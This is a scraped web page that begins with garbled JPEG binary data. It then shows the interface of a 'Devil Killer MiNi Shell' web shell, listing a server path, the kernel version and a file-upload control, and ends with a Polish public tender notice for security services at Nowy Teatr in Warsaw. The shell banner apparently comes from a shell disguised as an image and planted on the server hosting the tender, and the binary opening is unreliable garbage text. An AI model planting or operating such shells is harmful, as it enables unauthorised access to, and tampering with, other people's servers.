JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220919/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220919/0035427901-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> usługa całodobowej ochrony osób i mienia na terenie nieruchomości położonej w Warszawie przy ul. Madalińskiego 10/16 dla Nowego Teatru w Warszawie oraz ochrony wydarzeń organizowanych przez Nowy Teatr </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Międzynarodowe Centrum Kultury Nowy Teatr</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 141245324</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Madalińskiego 10/16</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">02-513</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@nowyteatr.org</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.nowyteatr.org</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samorządowy zakład budżetowy</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> usługa całodobowej ochrony osób i mienia na terenie nieruchomości położonej w Warszawie przy ul. Madalińskiego 10/16 dla Nowego Teatru w Warszawie oraz ochrony wydarzeń organizowanych przez Nowy Teatr </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-752978ac-3804-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00354279</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-09-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00034683/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Ochrona i monitoring</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zgodnie z art. 67 ustawy Pzp Zamawiający podaje, że wymagania techniczne i organizacyjne związane z korzystaniem w/w platform elektronicznych, w tym z wysyłaniem i odbieraniem korespondencji elektronicznej przekazywanej przy ich użyciu, opisane zostały w Regulaminie korzystania z miniPortalu oraz Regulaminie ePUAP</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/PN/1/9/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa całodobowej ochrony osób i mienia na terenie nieruchomości położonej w Warszawie<br/>przy ul. Madalińskiego 10/16 dla Nowego Teatru w Warszawie oraz ochrona wydarzeń organizowanych przez Nowy Teatr </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-11-03 do 2023-11-03</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.12.) Opis wznowienia</h3> Zamawiający przewiduje zamówienia, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp, w przypadku udzielenia, w okresie<br/>3 lat od dnia udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy usług lub robót budowlanych,<br/>zamówienia polegającego na powtórzeniu podobnych usług lub robót budowlanych, jeżeli takie zamówienie było<br/>przewidziane w ogłoszeniu o zamówieniu dla zamówienia podstawowego i jest zgodne z jego przedmiotem oraz całkowita<br/>wartość tego zamówienia została uwzględniona przy obliczaniu jego wartości <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający<br/>przewiduje zamówienia, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp, w przypadku udzielenia, w okresie 3 lat od dnia<br/>udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy usług lub robót budowlanych, zamówienia polegającego na<br/>powtórzeniu podobnych usług lub robót budowlanych, jeżeli takie zamówienie było przewidziane w ogłoszeniu o zamówieniu dla<br/>zamówienia podstawowego i jest zgodne z jego przedmiotem oraz całkowita wartość tego zamówienia została uwzględniona przy obliczaniu jego wartości</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert został określony w roz. XIII SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Liczba osób spełniających wymagania Zamawiającego do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">24</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">16</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu<br/>określone w niniejszym SWZ oraz nie podlegają wykluczeniu stosownie do:<br/>a. art. 108 ust. 1 oraz art. 109 ust. 1 pkt 1-10 z zastrzeżeniem art. 110 ust. 2 ustawy PZP<br/>b. oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu<br/>agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022 r. poz. 835).<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu określone wart. 112 ust. 2 pkt 1-4 ustawy Pzp, t.j.:<br/>1) W zakresie zdolności do występowania w obrocie gospodarczym:<br/>Warunek ten zostanie spełniony, jeżeli Wykonawca prowadzi działalność gospodarczą i jest wpisany do odpowiedniego<br/>rejestru.<br/>2) W zakresie uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej:<br/>Warunek ten zostanie spełniony, jeżeli Wykonawca posiada aktualną koncesję na działalność gospodarczą w zakresie<br/>usług ochrony osób i mienia, wydaną przez Ministra Spraw Wewnętrznych i Administracji zgodnie z ustawą z dnia 22<br/>sierpnia 1997 r. o ochronie osób i mienia (tekst jedn. Dz.U. z 2021 poz. 1995, dalej: “ustawa o ochronie osób i mienia”).<br/>3) W zakresie zdolności technicznej lub zawodowej – posiadają doświadczenie niezbędne do wykonania zamówienia:<br/>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że w ciągu ostatnich 3 lat przed upływem terminu składania<br/>ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), zrealizował co najmniej 2 usługi, z których każda<br/>polegała na całodobowej ochronie osób i mienia przez okres co najmniej 12 miesięcy, a wartość każdej z tych usług nie była<br/>niższa niż 150.000,00 zł brutto.<br/>4) W zakresie zdolności technicznej lub zawodowej – dysponują potencjałem technicznym i osobami zdolnymi do wykonania<br/>zamówienia:<br/>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje minimum 8 osobami spełniającymi wymagania<br/>Zamawiającego, przeznaczonymi do wykonywania usługi całodobowej ochrony, tj. zamówienia zgodnie z niniejszą SWZ.<br/>Zamawiający wskazuje, że Wykonawca stosownie do art. 19 ust. 1 pkt 2 lit. a ustawy o ochronie osób i mienia, jako<br/>przedsiębiorca prowadzący działalność gospodarczą w zakresie ochrony osób i mienia, jest obowiązany prowadzić i<br/>przechowywać dokumentację dotyczącą pracowników ochrony, w tym umowy o pracę, w ramach której Wykonawca<br/>prowadzi wykaz pracowników ochrony zawierający informacje, o których mowa w art. 19 ust. 2 ustawy o ochronie osób i<br/>mienia.<br/>Zamawiający wskazuje również, że Wykonawca, stosownie do art. 19 ust. 1 pkt 7 ustawy o ochronie osób i mienia, jest<br/>zobowiązany weryfikować karalność pracowników ochrony, a w przypadku przedsiębiorcy innego niż osoba fizyczna,<br/>dodatkowo osób, o których mowa w art. 17 ust. 1 pkt 2 ustawy o ochronie osób i mienia.Wymagania Zamawiającego dotyczące kwalifikacji osób przeznaczonych do wykonania zamówienia:<br/>- wykształcenie min. średnie;<br/>- umiejętność obsługi komputera umożliwiająca pracę z rejestratorem obrazu;<br/>- minimum roczne doświadczenie na stanowisku pracownika ochrony poparte referencjami;<br/>- posiadanie aktualnej legitymacji kwalifikowanego pracownika ochrony fizycznej zgodnie z ustawą o ochronie osób i mienia;<br/>- odbyte przeszkolenia z zakresu BHP, PPOŻ oraz ochrony danych osobowych;<br/>- ukończony kurs z zakresu pierwszej pomocy przedmedycznej;<br/>- podstawowa znajomość języka angielskiego, przy czym za podstawową znajomość języka angielskiego Zamawiający<br/>uważa znajomość języka angielskiego na poziomie takim, jak po ukończonym kursie na poziomie A1.<br/>Wykonawca najpóźniej na 3 dni roboczych przed datą rozpoczęcia wykonania usługi przedstawi Zamawiającemu na<br/>potwierdzenie spełnienia jego wymagań następujące aktualne i ważne dokumenty dla osób, wskazanych przez niego jako<br/>spełniające wymagania Zamawiającego i przeznaczonych do wykonania zamówienia:<br/>- świadectwo ukończenia szkoły, dokumentujące co najmniej średnie wykształcenie;<br/>- referencje z poprzedniego okresu zatrudnienia, dokumentujące należyte wykonywanie obowiązków pracownika ochrony wwymaganym przez Zamawiającego minimalnym okresie;<br/>- kserokopie legitymacji kwalifikowanego pracownika ochrony fizycznej;<br/>- zaświadczenia o odbytych przeszkoleniach z zakresu BHP, PPOŻ oraz ochrony danych osobowych;<br/>- zaświadczenie o ukończonym kursie z zakresu pierwszej pomocy przedmedycznej;<br/>- potwierdzenie podstawowej znajomości języka angielskiego, za które Zamawiający uznaje: świadectwo ukończenia kursu<br/>języka angielskiego na poziomie co najmniej podstawowym, lub świadectwo ukończenia szkoły, dokumentujące co najmniej<br/>średnie wykształcenie, na którym jednym z przedmiotów zaliczonych przez pracownika jest język angielski, zaś uzyskana<br/>ocena z tego przedmiotu to co najmniej dostateczny.<br/>Na podstawie art. 95 ust. 1 ustawy Pzp, Zamawiający informuje, że w zakresie zatrudnienia przez Wykonawcę lub<br/>podwykonawcę osób wykonujących usługi całodobowej ochrony wymaga zatrudnienia na podstawie stosunku pracy (umowy<br/>o pracę) wszystkich pracowników ochrony realizujących zamówienie, ponieważ wykonanie tych czynności polega na<br/>wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy (Dz. U. z 2022 r.<br/>poz. 1510).<br/>Wykonawca najpóźniej na 3 dni robocze przed datą rozpoczęcia wykonania usługi przedstawi Zamawiającemu kopie umów o pracę<br/>zawartych z pracownikami przeznaczonymi do wykonywania usługi całodobowej ochrony, wraz z dokumentem regulującym<br/>zakres obowiązków, jeżeli został sporządzony), potwierdzone za zgodność z oryginałem. Kopie umów powinny zostać<br/>zanonimizowane w sposób zapewniający ochronę danych osobowych pracowników (Wykonawca ukryje – zaczerni lub<br/>zamaluje korektorem adresy i nr PESEL pracowników). Imię i nazwisko pracownika nie podlegają anonimizacji. Informacje<br/>takie jak: data zawarcia umowy, rodzaj umowy o pracę, okres, na jaki została zawarta i wymiar etatu powinny być możliwe<br/>do zidentyfikowania. Wskutek nieprzedstawienia wszystkich w/w umów o pracę na zasadach i w terminie określonych<br/>powyżej, Zamawiający może wypowiedzieć zawartą umowę w trybie natychmiastowym z winy Wykonawcy. Pozostałe<br/>wymagania Zamawiającego dotyczące sposobu dokumentowania zatrudnienia, kontroli spełniania przez Wykonawcę orazsankcje z tytułu niespełnienia wymagań zawartych w art. 95 ust. 1 ustawy Pzp zawarte są w postanowieniach umowy o<br/>zamówienie publiczne, zgodnie z art. 438 ustawy Pzp.<br/>Zamawiający zastrzega sobie prawo przeprowadzenia wywiadów z wybranymi pracownikami spośród przeznaczonych<br/>przez Wykonawcę do wykonania zamówienia, w celu zbadania umiejętności tych pracowników w zakresie wymagań<br/>Zamawiającego co do kwalifikacji tych osób, w szczególności zaś w zakresie:<br/>- obsługi komputera umożliwiającej pracę z rejestratorem obrazu;<br/>- podstawowej znajomości języka angielskiego.<br/>W tym celu Zamawiający wyznaczy Wykonawcy odpowiedni termin (data i godzina - w godzinach pracy Zamawiającego), w<br/>którym wskazane osoby powinny stawić się w siedzibie Zamawiającego w celu przeprowadzenia wywiadów, zaś<br/>Wykonawca jest zobowiązany do zapewnienia obecności tych osób. Zamawiający zastrzega sobie prawo żądania od<br/>Wykonawcy wymiany tych pracowników Wykonawcy, którzy nie będą spełniać wymagań Zamawiającego, zaś Wykonawca<br/>jest obowiązany do niezwłocznego zapewnienia na ich miejsce osób, które rzeczywiście spełniają wymagania<br/>Zamawiającego i przedstawienia dla tych osób, na potwierdzenie spełniania wymagań, odpowiednich dokumentów, zgodnie<br/>z zestawieniem powyżej, jak i nowego wykazu osób w terminie wyznaczonym przez Zamawiającego, nie później jednak niż<br/>przed rozpoczęciem wykonywania zamówienia. Do tych nowych osób stosuje się również inne postanowienia niniejszych<br/>SWZ, w tym m.in. prawo przeprowadzenia z nimi wywiadów przez Zamawiającego, co Wykonawca jest zobowiązany<br/>umożliwić zgodnie z opisaną wyżej procedurą.<br/>Wykonawca zobowiązany jest do utrzymywania takiej liczby pracowników, która zapewni ciągłość ochrony w siedzibie<br/>Zamawiającego przy uwzględnieniu nagłych, nieprzewidzianych okoliczności (np. zasłabnięcie, nagła choroba, utrata<br/>uprawnień itp.)<br/>Wykonawca zobowiązany jest do utrzymywania w gotowości bądź każdorazowego zorganizowania pracowników o<br/>kwalifikacjach minimum jak podanych powyżej, na zlecenie Zamawiającego, do zabezpieczenia dodatkowej ochronywydarzeń organizowanych przez Nowy Teatr (w liczbie 1 – 3 osób w zależności od zlecenia złożonego przez<br/>Zamawiającego).<br/>5) W zakresie sytuacji ekonomicznej lub finansowej:<br/>Warunek ten zostanie uznany za spełniony, jeżeli Wykonawca wykaże, iż posiada ważne ubezpieczenie od OC w zakresie<br/>prowadzonej działalności zgodnej z przedmiotem niniejszego zamówienia na kwotę co najmniej 150.000,00 zł (słownie: sto<br/>pięćdziesiąt tysięcy złotych 00/100). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Spełnianie warunków udziału w postępowaniu:<br/>a) Aktualna i ważna koncesja wydana przez MSWiA na prowadzenie działalności gospodarczej w zakresie ochrony osób i mienia w<br/>formie bezpośredniej ochrony fizycznej stałej lub doraźnej.<br/>b) Wykaz wykonanych lub wykonywanych usług w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na<br/>rzecz których usługi zostały wykonane, obejmujący co najmniej dwie usługi, z których każda polegała na całodobowej ochronie osób<br/>i mienia przez okres co najmniej 12 miesięcy, a wartość każdej z tych usług nie była niższa niż 150.000,00 zł brutto, wraz z<br/>załączonymi dowodami określającymi czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których<br/>mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku<br/>świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie<br/>jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal<br/>wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3<br/>miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu – wg wzoru<br/>stanowiącego Załącznik nr 4 do SWZ<br/>c) Wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami oraz oświadczeniem, że osoby<br/>wykonujące zamówienie spełniają wymagania Zamawiającego przedstawione w SWZ (Rozdz. VI ust. 2 pkt 3) oraz posiadają ważne<br/>legitymacje kwalifikowanego pracownika ochrony fizycznej i będą posiadały ważne, wymagane uprawnienia w okresie<br/>obowiązywania umowy – wg wzoru stanowiącego Załącznik nr 6 do SWZ<br/>d) Polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w<br/>zakresie prowadzonej działalności na kwotę co najmniej 150.000,00 zł wraz z dowodem opłaty.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Celem potwierdzenia braku<br/>podstaw do wykluczenia Wykonawcy z postępowania oraz potwierdzenia spełnienia warunków udziału w postępowaniu, do oferty<br/>należy załączyć aktualne na dzień składania ofert następujące dokumenty:<br/>1) oświadczenie Wykonawcy o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu, wg. wzoru<br/>stanowiącego Załącznik nr 3 do SWZ (oryginał);<br/>2) oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz 